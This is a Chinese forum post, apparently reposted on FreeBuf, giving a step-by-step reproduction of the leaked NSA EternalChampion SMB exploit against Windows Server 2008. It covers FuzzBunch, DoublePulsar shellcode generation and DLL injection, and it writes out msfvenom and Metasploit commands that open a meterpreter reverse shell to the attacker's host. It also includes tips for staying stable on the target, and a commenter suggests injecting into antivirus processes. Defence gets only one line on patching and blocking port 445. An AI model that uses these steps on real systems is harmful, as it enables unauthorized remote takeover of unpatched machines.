nsa武器库

nsa武器库
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
NSA武器库之Eternalchampion（永恒冠军）复现 The thor2017-05-26金币奖励+10共794327人围观 ，发现 33 个不明物体 新手科普系统安全
一、准备工作
此次配置环境和上篇差不多

攻击机1
带有漏洞利用工具集的XP，并且此次需要准备好WinHex， IP 172.26.97.35

攻击机2
Kali， IP 172.26.97.226

靶机
Windows Server 2008 SP1 x86， IP 202.X.X.X，已经开启445端口

开启FuzzBunch
不知道怎么运行FuzzBunch的，请参考我的上篇博文，操作方式和上次一样。TargetIP写靶机IP 202.X.X.X，CallBack写运行fb的IP，也就是172.26.97.35，不使用Redirection

051617_0646_ShadowBroke2.png

二、开始
使用smbtouch探测
use smbtouch

execute
smbtouch会为我们探测出目标系统适用的漏洞利用程序

1.png

在这里我们可以看到，目标系统是32位的，EternalBlue和EternalSynergy不支持攻击靶机，EternalRomance无法攻击，只有EternalChampion可以。

使用Doublepulsar生成shellcode
smbtouch成功之后，我们使用Doublepulsar来生成shellcode

use Doublepulsar
我们一路回车默认，会发现多出来一个名为OutputInstall的选项，选择这个

2.png

然后输入路径，比如说C:\shellcode.bin，一路回车执行就会生成shellcode

将shellcode转换成HEX
由于EternalChampion需要的是ShellcodeBuffer而不是ShellcodeFile，所以这里我们需要将Doublepulsar生成的shellcode转换成十六进制；如果你用的是EternalRomance，那么应该用的是ShellcodeFile，可以跨过此步

使用WinHex打开我们刚刚生成的shellcode.bin，然后选择Edit-Copy All-Hex Values，如下图所示：

3.png

使用EternalChampion进行攻击
现在shellcode已经在我们的剪贴板中了，我们就要使用EternalChampion来进行攻击了。

use EternalChampion
在之后我们一路回车默认，信息应该都是和目标系统相符的。在Mode :: Delivery mechanism时像上次一样选择FB一路回车，在程序提示ShellcodeBuffer :: DOPU Shellcode buffer时右键粘贴进那一堆十六进制，由于Shellcode比较长（4KB），所以可能会花几秒钟才会粘贴完。

4.png

在之后我们一路回车默认，信息应该都是和目标系统相符的。在Mode :: Delivery mechanism时像上次一样选择FB。

5.png

之后程序会进行询问，我们回车就能够运行EternalChampion

啊哟， 赢了，金牌，NSA你们这群人真幽默……

6.png

注意：如果你是用的exploit需要Shellcode File，那么这里直接输入shellcode的路径，本例中为C:\shellcode.bin，推荐把shellcode放在根目录，据GitHub上某人的回复，如果放在某个目录下可能会导致exploit不认。

使用Doublepulsar注入恶意dll
在这之后，我们使用Doublepulsar注入恶意dll，和上次操作基本一致，这里我们就再复述下吧

但是在此之前，我想看看后门是否存在，那就Doublepulsar中的选择function: 1 ping，就可以确定后门是否存在啦

7.png

好，咱还是生成恶意dll并用Doublepulsar注入吧！

msfvenom生成恶意dll
切换到Kali，此次就使用reverse_tcp了

#32位操作系统，所以生成32位的dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.97.226 LPORT=8089 -f dll >badbad.dll

#打开MetaSploit，开始监听

set PAYLOAD windows/x64/meterpreter/reverse_tcp

use exploit/multi/handler

set LHOST172.26.97.226

set LPORT 8089

run

之后将这个dll拷贝到XP中，使用Python创建个http服务器

python –m SimpleHTTPServer 80
拿起久违的IE，下载这个badbad.dll文件

注入dll
use DoublePulsar
一路回车默认，只需要选择function 2 Run DLL，输入我们的dll文件路径

8.png

然后最后直接运行，就会发现反弹成功，拿到权限了！

9.png

啊哟，执行不了meterpreter命令？

在一些情况下，我们可能会拿到meterpreter的会话，但是可能会发现执行不了啥命令，ping下不通了，猜测目标机器蓝屏了，那咋办呢？

等等直到ping通，然后再次运行EternalChampion攻击，它会记得我们输入的shellcode，所以一路回车，然后再次运行Doublepulsar，在程序提示ProcessName [lsass.exe]:选择其他的以NT Authority\System运行的进程名，比如说spoolsv.exe, SearchIndexer.exe, lsm.exe，这就自己试试了。然后就应该不会蓝屏啦~

其实选择啥进程其实都是可以的，大不了运行meterpreter的时候migrate到其他进程就可以了。

三、后记
EternalBlue支持的系统
通过查看xml文件能发现，有点奇怪，EternalBlue的配置文件中支持了这么多系统，但是有时却报告不支持。

11.png

大家能看到，EternalBlue和EternalChampion是在Windows\Specials这个目录下，Special，足以看到这俩工具威力是多么巨大吧！真是可怕……

防范手段
安装SM17-010补丁，开启防火墙过滤445，关闭SMB服务。

*本文来源：The thor，原作者Benny小土豆，原文链接： https://www.bennythink.com/eternalchampion.html 转载请注明原链接以及FreeBuf.COM

The thor
The thor
1 篇文章
等级： 1级
||
上一篇：Linux内核ROP姿势详解（二）下一篇：语言分析发现：WannaCry勒索软件背后的开发者可能是中国人？
这些评论亮了

土豆一点都不好吃哦 回复
此文原创链接 ，没有遵循我声明的CC-BY-NC-SA中的BY，希望能够改正署名和来源，如果能够有个邮箱进一步探讨就更好了。
)18(亮了
发表评论已有 33 条评论

Kuis 2017-05-26回复 1楼
啊哟~

亮了(1)

wath the fuck 2017-05-26回复 2楼
转成16进制 针对03早都试过几十片 都没成功。

亮了(1)

aptx07 (1级) 2017-05-26回复 3楼
2003没成功、2008也没成功……

亮了(1)

The thor (1级) 2017-05-26回复
@ aptx07 并不是能全部成功，我这里校园网也有很多台存在漏洞但是利用失败的，有些成功的机器有杀软都能成功，所以我也很迷。不知道有些的失败原因。

亮了(1)

ysc3839 2017-05-29回复
@ The thor 杀软防不了内核漏洞，你完全可以注入进杀软的进程干坏事。

亮了(0)

The thor (1级) 2017-05-29回复
@ ysc3839 好的我可以去试试，谢谢

亮了(0)

纳尼 2017-05-26回复 4楼
buff那里我随便填个4096就可以了

亮了(1)

The thor (1级) 2017-05-26回复
你这样填的确能下一步，但是没有用的，这里必须要doublepulsar生成的shellcode转16进制

亮了(1)

aaa 2017-05-26回复
@ The thor 我之前有个虚机随便敲了几个数字可以成功，现在另一台必须用你的方法才行

亮了(1)

打闷到起 2017-05-26回复 5楼
@ aptx07 有个坑，虚拟机一定要多核！！！不然成功率极低！！！

亮了(2)

aptx07 (1级) 2017-05-27回复
@ 打闷到起 非常感谢，设置多核，测试成功了……

亮了(2)

sec360zz (1级) 2017-10-25回复
@ 打闷到起 老铁你是怎么发现需要多核的？

亮了(0)

请叫我飞翔的翔 (1级) 2018-03-22回复
@ 打闷到起 老哥6啊

亮了(0)

Mr_Sessi0n 2017-05-26回复 6楼
我想起 冠军之矛

亮了(1)

土豆一点都不好吃哦 2017-05-27回复 7楼
此文原创链接 ，没有遵循我声明的CC-BY-NC-SA中的BY，希望能够改正署名和来源，如果能够有个邮箱进一步探讨就更好了。

亮了(18)

xxxx 2017-05-27回复
@ 土豆一点都不好吃哦 原文作者来了，小编给这这没素质的人的发帖人一个警告吧，人家的文章。未经允许就私自转载，还不说出处。

亮了(1)

The thor (1级) 2017-05-27回复
如果你是原作者那在这里说声对不起，投稿匆忙也不知道怎么称呼你，然后你blog的链接我没有保存，当时在网吧google出来你文章看完直接实战了就投稿，没来得及保存。

亮了(1)

萌萌哒学长 2017-05-27回复
@ The thor 土豆是我的朋友，这篇文章确实是土豆原创的，在已经声明CC协议的情况下，请尊重原著者，附上本文源地址：https://www.bennythink.com/eternalchampion.html

亮了(1)

The thor (1级) 2017-05-27回复
@ 萌萌哒学长 嗯！谢谢帖链接

亮了(2)

Benny小土豆 2017-05-27回复
@ The thor 那么，请在文末或者是开头贴上原始链接，也就是`https://www.bennythink.com/eternalchampion.html`，可否？谢谢。

亮了(0)

The thor (1级) 2017-05-29回复
@ Benny小土豆 我试试看不知道现在文章可不可以编辑哈

亮了(0)

The thor (1级) 2017-05-29回复
@ Benny小土豆 抱歉不能编辑了

亮了(0)

Benny小土豆 2017-05-29回复
@ The thor

我不清楚freebuf的用户权限设置，也不想搞个账号试试。如果真的不能编辑，那么请你联系管理员寻求协助，加入署名或者删除文章，自行选择。

亮了(1)

AngelaY 专栏作者(9级) LIE TO ME 2017-05-29回复
@ Benny小土豆 我们编辑这边可以帮忙修改，造成了困扰不好意思。

亮了(1)

AngelaY 专栏作者(9级) LIE TO ME 2017-05-29回复
@ The thor 希望以后作者提交文章是也能多注意标明来源呢。

亮了(1)

Benny小土豆 2017-05-30回复
@ AngelaY 感谢帮助与支持！

亮了(1)

珂珂 2017-05-27回复 8楼
求大神解答，msf出现这种情况怎么回事？一直连接不上靶机，是不是端口或防火墙的问题？

亮了(2)

111111 2017-06-11回复
@ 珂珂 #32位操作系统，所以生成32位的dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.97.226 LPORT=8089 -f dll >badbad.dll

#打开MetaSploit，开始监听

set PAYLOAD windows/meterpreter/reverse_tcp

use exploit/multi/handler

set LHOST172.26.97.226

set LPORT 8089

run

亮了(0)

asd 2017-05-27回复 9楼
一、准备工作

此次配置环境和上篇差不多

上篇在哪里 #(滑稽)

亮了(2)

The thor (1级) 2017-05-27回复
@ asd Eternalblue还有Eternalromance这些配置都一样的好吧。并且FB其它用户发过了没必要再给你贴一遍吧。

亮了(3)

奔跑的蜗牛壳 2017-05-27回复
@ The thor 我也好想知道上一篇在哪里…..

还请务必遵守 原文作者的 CC-BY-NC-SA协议，能够改正署名和来源，原文作者 @ 土豆一点都不好吃哦

地址

https://www.bennythink.com/eternalchampion.html

亮了(1)

lee 2017-05-27回复 10楼
EternalChampion 这不是和EternalBlue 一样么，写这文章有什么意义

亮了(2)

daimashi (1级) 2017-06-11回复 11楼
反弹成功后，电脑提示一分钟后注销，不知道哪里有问题

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
The thor
The thor

这家伙太懒，还未填写个人描述！

1
文章数
8
评论数
最近文章
NSA武器库之Eternalchampion（永恒冠军）复现
2017.05.26

浏览更多
相关阅读
NSA武器库之Eternalchampion（永恒冠军）复现影子经纪人曝光的NSA大杀器可能与Stuxnet相关NSA新型APT框架曝光：DarkPulsarFreeBuf视频组：揭秘美国国安局（NSA）神秘部门TAO（中文字幕）NSA正式公开官方GitHub帐号，已经有32个项目
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank